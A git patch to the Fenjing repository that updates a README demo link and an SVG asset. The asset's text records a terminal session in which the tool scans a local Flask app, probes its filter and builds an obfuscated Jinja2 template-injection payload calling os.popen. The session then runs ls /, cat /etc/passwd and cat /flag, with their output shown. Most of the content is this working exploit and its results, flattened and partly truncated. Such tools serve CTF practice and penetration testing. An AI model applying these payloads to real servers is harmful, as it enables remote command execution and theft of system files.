From d755fc842df8bce2d7a5f4bdd2f5a344db651d51 Mon Sep 17 00:00:00 2001
From: Marven11 <110723864+Marven11@users.noreply.github.com>
Date: Tue, 26 Dec 2023 12:46:48 +0800
Subject: [PATCH] Update README
---
README.md | 2 +-
assets/demo.svg | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 2f9692a..9b1de4a 100755
--- a/README.md
+++ b/README.md
@@ -14,7 +14,7 @@
## 演示
-[![asciicast](assets/demo.svg)](https://asciinema.org/a/TCtEXFymWedBthfQPs3rnocL9)
+[![asciicast](assets/demo.svg)](https://asciinema.org/a/rewsTVvAPqH59GWNtn7QmZ6RU)
## 主要特性
diff --git a/assets/demo.svg b/assets/demo.svg
index 25634d1..d783078 100644
--- a/assets/demo.svg
+++ b/assets/demo.svg
@@ -1 +1 @@
-
\ No newline at end of file
+➜Fenjinggit:(dev)✗➜Fenjinggit:(dev)✗python➜Fenjinggit:(dev)✗python-m➜Fenjinggit:(dev)✗python-mfenjing➜Fenjinggit:(dev)✗python-mfenjingscan➜Fenjinggit:(dev)✗python-mfenjingscan--url➜Fenjinggit:(dev)✗python-mfenjingscan--url'http://127.0.0.1:7888/secr3ttt'ttt'--intervalttt'--interval0.02______/__/______(_|_)________//_/_\/__\///__\/__`//__/__///////////_///_/\___/_//_/_//_/_//_/\__,//___//____/------MadewithpassionbyMarven11WARNING:[scan_url]|StartscanningWARNING:[scan_url]|Bursting3params...WARNING:[scan_url]|Foundgetparamswithburst:{'klf'}WARNING:[cli]|Scanform:{'action':'/secr3ttt','method':'GET','inputs':{'klf'}}INFO:[cracker]|Targetispython3INFO:[cracker]|Cracking...INFO:[waf_func_gen]|Testingdangerouskeyword'sbsm37sbsm'INFO:[waf_func_gen]|Testingdangerouskeyword'sbsm8sbsm'INFO:[waf_func_gen]|Testingdangerouskeyword'rhumsubclassesrhum'INFO:[waf_func_gen]|Testingdangerouskeyword'rhumforrhum'INFO:[waf_func_gen]|Testingdangerouskeyword'rhumargrhum'INFO:[waf_func_gen]|Testingdangerouskeyword'rhumindexrhum'INFO:[waf_func_gen]|Testingdangerouskeyword'rhum\\urhum'INFO:[waf_func_gen]|Testingdangerouskeyword'rhum),)rhum'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiisystemeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiisubprocesseyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiattreyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiinoteyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiirangeeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii2eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii0"eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiilengtheyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiinamespaceeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii7eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii]eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii\\xeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiichreyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiflashedeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii\\eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiconfigeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii"eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiifeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiglobaleyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiopeneyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiurl_foreyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiclasseyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii}}eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiibuiltinseyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii{{eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii0eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii1eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii5eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiimporteyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiurleyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiselfeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiappeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiirequesteyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiicateyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiiniteyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii4eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii.eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiordeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii3eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii+eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiget_flashed_messageseyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiincludeeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii_eyii'INFO:[waf_func_gen]|Testingdangerouskeyword"eyii'eyii"INFO:[waf_func_gen]|Testingdangerouskeyword'eyii%eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii|eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiibaseeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiigetitemeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiioseyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiipopeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiidicteyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii))eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii=eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'iodsenviods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodsposixiods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodsreadiods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodspopeniods'INFO:[waf_func_gen]|Testingdangerouskeyword'iods~iods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodscountiods'INFO:[waf_func_gen]|Testingdangerouskeyword'iods[iods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodsmroiods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodscdiods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodsvalueiods'INFO:[waf_func_gen]|Testingdangerouskeyword'iods9iods'INFO:[waf_func_gen]|Testingdangerouskeyword'zbcoglobalszbco'INFO:[waf_func_gen]|Testingdangerouskeyword'zbcoevalzbco'INFO:[waf_func_gen]|Testingdangerouskeyword'zbco6zbco'INFO:[waf_func_gen]|Testingdangerouskeyword'zbcoflagzbco'INFO:[waf_func_gen]|Testingdangerouskeyword'zbcolipsumzbco'INFO:[waf_func_gen]|Testingdangerouskeyword'zbcoexeczbco'INFO:[waf_func_gen]|Testingdangerouskeyword'378378'INFO:[waf_func_gen]|Testingdangerouskeyword'subclassesforsubclassesfor'INFO:[waf_func_gen]|Testingdangerouskeyword'argindexargindex'INFO:[waf_func_gen]|Testingdangerouskeyword'\\u),)\\u),)'INFO:[waf_func_gen]|Testingdangerouskeyword'systemsubprocesssystemsubprocess'INFO:[waf_func_gen]|Testingdangerouskeyword'attrnotattrnot'INFO:[waf_func_gen]|Testingdangerouskeyword'range2range2'INFO:[waf_func_gen]|Testingdangerouskeyword'0"length0"length'INFO:[waf_func_gen]|Testingdangerouskeyword'namespace7namespace7'INFO:[waf_func_gen]|Testingdangerouskeyword']\\x]\\x'INFO:[waf_func_gen]|Testingdangerouskeyword'chrflashedchrflashed'INFO:[waf_func_gen]|Testingdangerouskeyword'\\config\\config'INFO:[waf_func_gen]|Testingdangerouskeyword'"if"if'INFO:[waf_func_gen]|Testingdangerouskeyword'globalopenglobalopen'INFO:[waf_func_gen]|Testingdangerouskeyword'url_forclassurl_forclass'INFO:[waf_func_gen]|Testingdangerouskeyword'}}builtins}}builtins'INFO:[waf_func_gen]|Testingdangerouskeyword'{{0{{0'INFO:[waf_func_gen]|Testingdangerouskeyword'1515'INFO:[waf_func_gen]|Testingdangerouskeyword'importurlimporturl'INFO:[waf_func_gen]|Testingdangerouskeyword'selfappselfapp'INFO:[waf_func_gen]|Testingdangerouskeyword'requestcatrequestcat'INFO:[waf_func_gen]|Testingdangerouskeyword'init4init4'INFO:[waf_func_gen]|Testingdangerouskeyword'.ord.ord'INFO:[waf_func_gen]|Testingdangerouskeyword'3+3+'INFO:[waf_func_gen]|Testingdangerouskeyword'get_flashed_messagesincludeget_flashed_messagesinclude'INFO:[waf_func_gen]|Testingdangerouskeyword"_'_'"INFO:[waf_func_gen]|Testingdangerouskeyword'%|%|'INFO:[waf_func_gen]|Testingdangerouskeyword'basegetitembasegetitem'INFO:[waf_func_gen]|Testingdangerouskeyword'ospopospop'INFO:[waf_func_gen]|Testingdangerouskeyword'dict))dict))'INFO:[waf_func_gen]|Testingdangerouskeyword'=env=env'INFO:[waf_func_gen]|Testingdangerouskeyword'posixreadposixread'INFO:[waf_func_gen]|Testingdangerouskeyword'popen~popen~'INFO:[waf_func_gen]|Testingdangerouskeyword'count[count['INFO:[waf_func_gen]|Testingdangerouskeyword'mrocdmrocd'INFO:[waf_func_gen]|Testingdangerouskeyword'value9value9'INFO:[waf_func_gen]|Testingdangerouskeyword'globalsevalglobalseval'INFO:[waf_func_gen]|Testingdangerouskeyword'6flag6flag'INFO:[waf_func_gen]|Testingdangerouskeyword'lipsumexeclipsumexec'INFO:[waf_func_gen]|Testingdangerouskeyword'3737'INFO:[waf_func_gen]|Testingdangerouskeyword'88'INFO:[waf_func_gen]|Testingdangerouskeyword'subclassessubclasses'INFO:[waf_func_gen]|Testingdangerouskeyword'forfor'INFO:[waf_func_gen]|Testingdangerouskeyword'argarg'INFO:[waf_func_gen]|Testingdangerouskeyword'indexindex'INFO:[waf_func_gen]|Testingdangerouskeyword'\\u\\u'INFO:[waf_func_gen]|Testingdangerouskeyword'),)),)'INFO:[waf_func_gen]|Testingdangerouskeyword'systemsystem'INFO:[waf_func_gen]|Testingdangerouskeyword'subprocesssubprocess'INFO:[waf_func_gen]|Testingdangerouskeyword'attrattr'INFO:[waf_func_gen]|Testingdangerouskeyword'notnot'INFO:[waf_func_gen]|Testingdangerouskeyword'rangerange'INFO:[waf_func_gen]|Testingdangerouskeyword'22'INFO:[waf_func_gen]|Testingdangerouskeyword'0"0"'INFO:[waf_func_gen]|Testingdangerouskeyword'lengthlength'INFO:[waf_func_gen]|Testingdangerouskeyword'namespacenamespace'INFO:[waf_func_gen]|Testingdangerouskeyword'77'INFO:[waf_func_gen]|Testingdangerouskeyword']]'INFO:[waf_func_gen]|Testingdangerouskeyword'\\x\\x'INFO:[waf_func_gen]|Testingdangerouskeyword'chrchr'INFO:[waf_func_gen]|Testingdangerouskeyword'flashedflashed'INFO:[waf_func_gen]|Testingdangerouskeyword'\\\\'INFO:[waf_func_gen]|Testingdangerouskeyword'configconfig'INFO:[waf_func_gen]|Testingdangerouskeyword'""'INFO:[waf_func_gen]|Testingdangerouskeyword'ifif'INFO:[waf_func_gen]|Testingdangerouskeyword'globalglobal'INFO:[waf_func_gen]|Testingdangerouskeyword'openopen'INFO:[waf_func_gen]|Testingdangerouskeyword'url_forurl_for'INFO:[waf_func_gen]|Testingdangerouskeyword'classclass'INFO:[waf_func_gen]|Testingdangerouskeyword'}}}}'INFO:[waf_func_gen]|Testingdangerouskeyword'builtinsbuiltins'INFO:[waf_func_gen]|Testingdangerouskeyword'{{{{'INFO:[waf_func_gen]|Testingdangerouskeyword'00'INFO:[waf_func_gen]|Testingdangerouskeyword'11'INFO:[waf_func_gen]|Testingdangerouskeyword'55'INFO:[waf_func_gen]|Testingdangerouskeyword'importimport'INFO:[waf_func_gen]|Testingdangerouskeyword'urlurl'INFO:[waf_func_gen]|Testingdangerouskeyword'selfself'INFO:[waf_func_gen]|Testingdangerouskeyword'appapp'INFO:[waf_func_gen]|Testingdangerouskeyword'requestrequest'INFO:[waf_func_gen]|Testingdangerouskeyword'catcat'INFO:[waf_func_gen]|Testingdangerouskeyword'initinit'INFO:[waf_func_gen]|Testingdangerouskeyword'44'INFO:[waf_func_gen]|Testingdangerouskeyword'..'INFO:[waf_func_gen]|Testingdangerouskeyword'ordord'INFO:[waf_func_gen]|Testingdangerouskeyword'33'INFO:[waf_func_gen]|Testingdangerouskeyword'++'INFO:[waf_func_gen]|Testingdangerouskeyword'get_flashed_messagesget_flashed_messages'INFO:[waf_func_gen]|Testingdangerouskeyword'includeinclude'INFO:[waf_func_gen]|Testingdangerouskeyword'__'INFO:[waf_func_gen]|Testingdangerouskeyword"''"INFO:[waf_func_gen]|Testingdangerouskeyword'%%'INFO:[waf_func_gen]|Testingdangerouskeyword'||'INFO:[waf_func_gen]|Testingdangerouskeyword'basebase'INFO:[waf_func_gen]|Testingdangerouskeyword'getitemgetitem'INFO:[waf_func_gen]|Testingdangerouskeyword'osos'INFO:[waf_func_gen]|Testingdangerouskeyword'poppop'INFO:[waf_func_gen]|Testingdangerouskeyword'dictdict'INFO:[waf_func_gen]|Testingdangerouskeyword'))))'INFO:[waf_func_gen]|Testingdangerouskeyword'=='INFO:[waf_func_gen]|Testingdangerouskeyword'envenv'INFO:[waf_func_gen]|Testingdangerouskeyword'posixposix'INFO:[waf_func_gen]|Testingdangerouskeyword'readread'INFO:[waf_func_gen]|Testingdangerouskeyword'popenpopen'INFO:[waf_func_gen]|Testingdangerouskeyword'~~'INFO:[waf_func_gen]|Testingdangerouskeyword'countcount'INFO:[waf_func_gen]|Testingdangerouskeyword'[['INFO:[waf_func_gen]|Testingdangerouskeyword'mromro'INFO:[waf_func_gen]|Testingdangerouskeyword'cdcd'INFO:[waf_func_gen]|Testingdangerouskeyword'valuevalue'INFO:[waf_func_gen]|Testingdangerouskeyword'99'INFO:[waf_func_gen]|Testingdangerouskeyword'globalsglobals'INFO:[waf_func_gen]|Testingdangerouskeyword'evaleval'INFO:[waf_func_gen]|Testingdangerouskeyword'66'INFO:[waf_func_gen]|Testingdangerouskeyword'flagflag'INFO:[waf_func_gen]|Testingdangerouskeyword'lipsumlipsum'INFO:[waf_func_gen]|Testingdangerouskeyword'execexec'INFO:[waf_func_gen]|Testinglongpayloads...INFO:[full_payload_gen]|use{{PAYLOAD}}INFO:[full_payload_gen]|Addingsomestringvariables...INFO:[payload_gen]|failedgeneratingvariable_of('__add__'),itmightnotbeanissue.INFO:[payload_gen]|Great,string('%c')canbe(prrc,dict(c=x)|join)|joinINFO:[full_payload_gen]|Adding'%c'with{%setfa=(prrc,dict(c=x)|join)|join%}INFO:[payload_gen]|failedgeneratingstring_concatmany([('expression',10,[('literal','dict(__=x)|join')])]),itmightnotbeanissue.INFO:[payload_gen]|failedgeneratingvariable_of('__globals__'),itmightnotbeanissue.INFO:[payload_gen]|failedgeneratingvariable_of('__mul__'),itmightnotbeaINFO:[payload_gen]|Great,string('__')canbex|center(2)|replace(x|center|first,fa)%(95,95)INFO:[full_payload_gen]|Adding'__'with{%setci=x|center(2)|replace(x|center|first,fa)%(95,95)%}INFO:[payload_gen]|Great,string('class')canbedict(CLASS=x)|first|lowerINFO:[full_payload_gen]|Adding'class'with{%setcl=dict(CLASS=x)|first|lower%}INFO:[payload_gen]|Great,string('globals')canbedict(GLOBALS=x)|first|lowerINFO:[full_payload_gen]|Adding'globals'with{%setgl=dict(GLOBALS=x)|first|lower%}INFO:[payload_gen]|Great,string('init')canbedict(INIT=x)|first|lowerINFO:[full_payload_gen]|Adding'init'with{%setin=dict(INIT=x)|first|lower%}INFO:[payload_gen]|Great,string('dict')canbedict(DICT=x)|first|lowerINFO:[full_payload_gen]|Adding'dict'with{%setdi=dict(DICT=x)|first|lower%}INFO:[payload_gen]|Great,string('builtins')canbedict(BUILTINS=x)|first|lowerINFO:[full_payload_gen]|Adding'builtins'with{%setbu=dict(BUILTINS=x)|first|lower%}INFO:[payload_gen]|Great,string('getitem')canbedict(GETITEM=x)|first|lowerINFO:[full_payload_gen]|Adding'getitem'with{%setge=dict(GETITEM=x)|first|lINFO:[payload_gen]|Great,string('import')canbedict(IMPORT=x)|first|lowerINFO:[full_payload_gen]|Adding'import'with{%setim=dict(IMPORT=x)|first|lower%}INFO:[payload_gen]|Great,string('add')canbedict(ADD=x)|first|lowerINFO:[full_payload_gen]|Adding'add'with{%setad=dict(ADD=x)|first|lower%}INFO:[payload_gen]|Great,string('mul')canbedict(MUL=x)|first|lowerINFO:[full_payload_gen]|Adding'mul'with{%setmu=dict(MUL=x)|first|lower%}INFO:[payload_gen]|Great,string('mod')canbedict(MOD=x)|first|lowerINFO:[full_payload_gen]|Adding'mod'with{%setmo=dict(MOD=x)|first|lower%}INFO:[payload_gen]|Great,string('os')canbedict(OS=x)|first|lowerINFO:[full_payload_gen]|Adding'os'with{%setjm=dict(OS=x)|first|lower%}INFO:[payload_gen]|Great,string('popen')canbedict(POPEN=x)|first|lowerINFO:[full_payload_gen]|Adding'popen'with{%setpo=dict(POPEN=x)|first|lowerINFO:[payload_gen]|Great,string('read')canbedict(READ=x)|first|lowerINFO:[full_payload_gen]|Adding'read'with{%setre=dict(READ=x)|first|lower%}INFO:[payload_gen]|Great,string('pop')canbedict(POP=x)|first|lowerINFO:[full_payload_gen]|Adding'pop'with{%setfh=dict(POP=x)|first|lower%}INFO:[payload_gen]|Great,string('get')canbedict(GET=x)|first|lowerINFO:[full_payload_gen]|Adding'get'with{%setgt=dict(GET=x)|first|lower%}INFO:[payload_gen]|Great,string('eval')canbedict(EVAL=x)|first|lowerINFO:[full_payload_gen]|Adding'eval'with{%setev=dict(EVAL=x)|first|lower%}INFO:[payload_gen]|Great,string('bytes')canbedict(BYTES=x)|first|lowerINFO:[full_payload_gen]|Adding'bytes'with{%setby=dict(BYTES=x)|first|lowerINFO:[payload_gen]|Great,string('decode')canbedict(DECODE=x)|first|lowerINFO:[full_payload_gen]|Adding'decode'with{%setde=dict(DECODE=x)|first|lowINFO:[payload_gen]|Great,string('chr')canbedict(CHR=x)|first|lowerINFO:[full_payload_gen]|Adding'chr'with{%setch=dict(CHR=x)|first|lower%}INFO:[payload_gen]|Great,string('truediv')canbedict(TRUEDIV=x)|first|lowerINFO:[full_payload_gen]|Adding'truediv'with{%settr=dict(TRUEDIV=x)|first|lINFO:[payload_gen]|failedgeneratingstring_concatmany([('multiply',('string_underline',),('integer',2)),('string','class'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('class')canbeclINFO:[payload_gen]|Great,string('__class__')canbe(ndll,ndll,cl,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__class__'with{%setca=(ndll,ndll,cl,ndll,ndll)|join%}underline',),('integer',2)),('string','globals'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('globals')canbeglINFO:[payload_gen]|Great,string('__globals__')canbe(ndll,ndll,gl,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__globals__'with{%setgo=(ndll,ndll,gl,ndll,ndll)|join%}underline',),('integer',2)),('string','init'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('init')canbeinINFO:[payload_gen]|Great,string('__init__')canbe(ndll,ndll,in,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__init__'with{%setii=(ndll,ndll,in,ndll,ndll)|join%}underline',),('integer',2)),('string','dict'),('multiply',('string_underliINFO:[payload_gen]|Great,string('dict')canbediINFO:[payload_gen]|Great,string('__dict__')canbe(ndll,ndll,di,ndll,ndll)|jINFO:[full_payload_gen]|Adding'__dict__'with{%setdc=(ndll,ndll,di,ndll,ndlunderline',),('integer',2)),('string','builtins'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('builtins')canbebuINFO:[payload_gen]|Great,string('__builtins__')canbe(ndll,ndll,bu,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__builtins__'with{%setbi=(ndll,ndll,bu,ndll,ndll)|join%}underline',),('integer',2)),('string','getitem'),('multiply',('string_undeINFO:[payload_gen]|Great,string('getitem')canbegeINFO:[payload_gen]|Great,string('__getitem__')canbe(ndll,ndll,ge,ndll,ndllINFO:[full_payload_gen]|Adding'__getitem__'with{%setgi=(ndll,ndll,ge,ndll,underline',),('integer',2)),('string','import'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('import')canbeimINFO:[payload_gen]|Great,string('__import__')canbe(ndll,ndll,im,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__import__'with{%setip=(ndll,ndll,im,ndll,ndll)|join%}underline',),('integer',2)),('string','add'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('add')canbeadINFO:[payload_gen]|Great,string('__add__')canbe(ndll,ndll,ad,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__add__'with{%setcq=(ndll,ndll,ad,ndll,ndll)|join%}underline',),('integer',2)),('string','mul'),('multiply',('string_underlinINFO:[payload_gen]|Great,string('mul')canbemuINFO:[payload_gen]|failedgeneratingenclose(('string_concat',('string_underline',),('string_underline',))),itmightnotbeanissue.INFO:[payload_gen]|failedgeneratingenclose(('string_concat',('string_concat',('string_underline',),('string_underline',)),('string','mul'))),itmightnotbeanissue.',('string_concat',('string_underline',),('string_underline',)),('string','mul')),('string_underline',))),itmightnotbeanissue.INFO:[payload_gen]|Great,string('__mul__')canbendll|attr(cq)(ndll)|attr(cq)(mu)|attr(cq)(ndll)|attr(cq)(ndll)INFO:[full_payload_gen]|Adding'__mul__'with{%setml=ndll|attr(cq)(ndll)|attr(cq)(mu)|attr(cq)(ndll)|attr(cq)(ndll)%}INFO:[payload_gen]|Great,string('mod')canbemoINFO:[payload_gen]|failedgeneratingenclose(('multiply',('string_underline',),('integer',2))),itmightnotbeanissue.INFO:[payload_gen]|failedgeneratingenclose(('string_concat',('multiply',('string_underline',),('integer',2)),('string','mod'))),itmightnotbeanissue.underline',),('integer',2)),('string','mod'),('multiply',('string_underlin',('string_underline',),('string_underline',)),('string','mod'))),itmightmod')),('string_underline',))),itmightnotbeanissue.INFO:[payload_gen]|Great,string('__mod__')canbendll|attr(cq)(ndll)|attr(cq)(mo)|attr(cq)(ndll)|attr(cq)(ndll)INFO:[full_payload_gen]|Adding'__mod__'with{%setmd=ndll|attr(cq)(ndll)|attr(cq)(mo)|attr(cq)(ndll)|attr(cq)(ndll)%}INFO:[payload_gen]|Great,string('truediv')canbetrstring_underline',),('integer',2)),('string','truediv'))),itmightnotbeaunderline',),('integer',2)),('string','truediv'),('multiply',('string_unde',('string_underline',),('string_underline',)),('string','truediv'))),itmightnotbeanissue.truediv')),('string_underline',))),itmightnotbeanissue.INFO:[payload_gen]|Great,string('__truediv__')canbendll|attr(cq)(ndll)|attr(cq)(tr)|attr(cq)(ndll)|attr(cq)(ndll)INFO:[full_payload_gen]|Adding'__truediv__'with{%settu=ndll|attr(cq)(ndll)|attr(cq)(tr)|attr(cq)(ndll)|attr(cq)(ndll)%}INFO:[payload_gen]|Great,string('%c')canbefaINFO:[full_payload_gen]|Adding'%c'with{%setjs=fa%}INFO:[payload_gen]|Great,integer(101)canbe1٠١INFO:[payload_gen]|Great,integer(99)canbe9٩INFO:[payload_gen]|Great,integer(104)canbe1٠٤INFO:[payload_gen]|Great,integer(102)canbe1٠٢INFO:[payload_gen]|Great,integer(51)canbe5١INFO:[payload_gen]|Great,integer(110)canbe1١٠INFO:[payload_gen]|Great,integer(106)canbe1٠٦INFO:[payload_gen]|Great,integer(49)canbe4٩INFO:[payload_gen]|Great,integer(103)canbe1٠٣INFO:[payload_gen]|Great,integer(59)canbe5٩INFO:[payload_gen]|Great,string('echof3nj1ng;')canbelipsum|attr(go)|attr(gi)(bi)|attr(gi)(by)((1٠١,9٩,1٠٤,111,32,1٠٢,5١,1١٠,32,32,1٠٦,4٩,1١٠,1٠٣,5٩),)|attr(de)()INFO:[full_payload_gen]|Adding'echof3nj1ng;'with{%setec=lipsum|attr(go)|attr(gi)(bi)|attr(gi)(by)((1٠١,9٩,1٠٤,111,32,1٠٢,5١,1١٠,32,32,1٠٦,4٩,1١٠,1٠٣,5٩),)|attr(de)()%}INFO:[full_payload_gen]|Startgeneratingfinalexpression...INFO:[payload_gen]|Great,string('__globals__')canbegoINFO:[payload_gen]|failedgeneratingenclose(('attribute',('jinja_context_var','lipsum'),'__globals__')),itmightnotbeanissue.INFO:[payload_gen]|Great,string('__getitem__')canbegiINFO:[payload_gen]|Great,string('__builtins__')canbebiINFO:[payload_gen]|failedgeneratingenclose(('item',('attribute',('jinja_context_var','lipsum'),'__globals__'),'__builtins__')),itmightnotbeanissue.INFO:[payload_gen]|Great,string('__import__')canbeipINFO:[payload_gen]|Great,string('os')canbejmINFO:[payload_gen]|Great,wegeneratemodule_os()INFO:[payload_gen]|Great,string('popen')canbepoINFO:[payload_gen]|Great,string('echof3nj1ng;')canbeecINFO:[payload_gen]|Great,wegenerateos_popen_obj('echof3nj1ng;')INFO:[payload_gen]|Great,string('read')canbereINFO:[payload_gen]|Great,wegenerateos_popen_read('echof3nj1ng;')INFO:[cracker]|Testinggeneratedpayload.INFO:[cracker]|Success!Nowwecangeneratepayloads.Example/示例:$>>ls/$>>@eval1+2+3+100000$>>@get-configType@helpforfullhelp/输入@help获得完整帮助$>>$>>ls$>>ls/INFO:[payload_gen]|Great,integer(108)canbe1٠٨INFO:[payload_gen]|Great,integer(47)canbe4٧INFO:[payload_gen]|Great,string('ls/')canbelipsum|attr(go)|attr(gi)(bi)|attr(gi)(by)((1٠٨,115,32,4٧),)|attr(de)()INFO:[payload_gen]|Great,wegenerateos_popen_obj('ls/')INFO:[payload_gen]|Great,wegenerateos_popen_read('ls/')INFO:[cli]|Submitpayload{%setjm=dict(OS=x)|first|lower%}{%setpo=dict(POPEN=x)|first|lower%}{%setby=dict(BYTES=x)|first|lower%}{%setde=dict(DECODE=x)|first|lower%}{%setre=dict(READ=x)|first|lower%}{%setndll={}|select()|trim|list|batch(25)|first|last%}{%setgl=dict(GLOBALS=x)|first|lower%}{%setgo=(ndll,ndll,gl,ndll,ndll)|join%}{%setge=dict(GETITEM=x)|first|lower%}{%setgi=(ndll,ndll,ge,ndll,ndll)|join%}{%setbu=dict(BUILTINS=x)|first|lower%}{%setbi=(ndll,ndll,bu,ndll,ndll)|join%}{%setim=dict(IMPORT=x)|first|lower%}{%setip=(ndll,ndll,im,ndll,ndll)|join%}{{lipsum|attr(go)|attr(gi)(bi)|attr(gi)(ip)(jm)|attr(po)(lipsum|attrbinbootdevetcflaghomeliblib64lost+foundmediamntoptprocrootrunsbinsrvsystmpusrvar$>>c$>>ca$>>cat$>>cat/$>>cat/etc/passwdINFO:[payload_gen]|Great,integer(100)canbe1٠٠INFO:[payload_gen]|Great,string('cat/etc/passwd')canbelipsum|attr(go)|attr(gi)(bi)|attr(gi)(by)((9٩,97,116,32,4٧,1٠١,116,9٩,4٧,112,97,115,115,119,1٠٠),)|INFO:[payload_gen]|Great,wegenerateos_popen_obj('cat/etc/passwd')INFO:[payload_gen]|Great,wegenerateos_popen_read('cat/etc/passwd')saslauth:x:990:76:Saslauthduser:/run/saslauthd:/sbin/nologinrpcuser:x:29:29:RPCServiceUser:/var/lib/nfs:/sbin/nologinopenvpn:x:989:988:OpenVPN:/etc/openvpn:/sbin/nologinnm-openvpn:x:988:987:DefaultuserforrunningopenvpnspawnedbyNetworkManager:/:/sbin/nologinunbound:x:987:986:UnboundDNSresolver:/var/lib/unbound:/sbin/nologinabrt:x:173:173::/etc/abrt:/sbin/nologinflatpak:x:986:984:Flatpaksystemhelper:/:/usr/sbin/nologingdm:x:42:42:GNOMEDisplayManager:/var/lib/gdm:/usr/sbin/nologingnome-initial-setup:x:985:983::/run/gnome-initial-setup/:/sbin/nologinvboxadd:x:984:1::/var/run/vboxadd:/sbin/nologinsshd:x:74:74:Privilege-separatedSSH:/usr/share/empty.sshd:/usr/sbin/nologintcpdump:x:72:72:tcpdump:/:/usr/sbin/nologinsystemd-coredump:x:978:978:systemdCoreDumper:/:/usr/sbin/nologinsystemd-timesync:x:977:977:systemdTimeSynchronization:/:/usr/sbin/nologincube:x:1000:1000:cube:/home/cube:/usr/bin/zshclash:x:976:976::/home/clash:/bin/bashakmods:x:975:975:Userisusedbyakmodstobuildakmodpackages:/var/cache/akmods/:/sbin/nologincaddy:x:974:970:Caddywebserver:/var/lib/caddy:/sbin/nologinnginx:x:973:969:Nginxwebserver:/var/lib/nginx:/sbin/nologin$>>cat/flagINFO:[payload_gen]|Great,string('cat/flag')canbelipsum|attr(go)|attr(gi)(bi)|attr(gi)(by)((9٩,97,116,32,4٧,1٠٢,1٠٨,97,1٠٣),)|attr(de)()INFO:[payload_gen]|Great,wegenerateos_popen_obj('cat/flag')INFO:[payload_gen]|Great,wegenerateos_popen_read('cat/flag')(go)|attr(gi)(bi)|attr(gi)(by)((9٩,97,116,32,4٧,1٠٢,1٠٨,97,1٠٣),)|attr(de)(),)|attr(re)()}}klf不会连这都绕不过去吧~你好!FLAG{SUCCESS!Y0U_M4DE_1T!}win.html$>>Bye!➜Fenjinggit:(dev)✗p➜Fenjinggit:(dev)✗py➜Fenjinggit:(dev)✗pyt➜Fenjinggit:(dev)✗pyth➜Fenjinggit:(dev)✗pytho➜Fenjinggit:(dev)✗pyt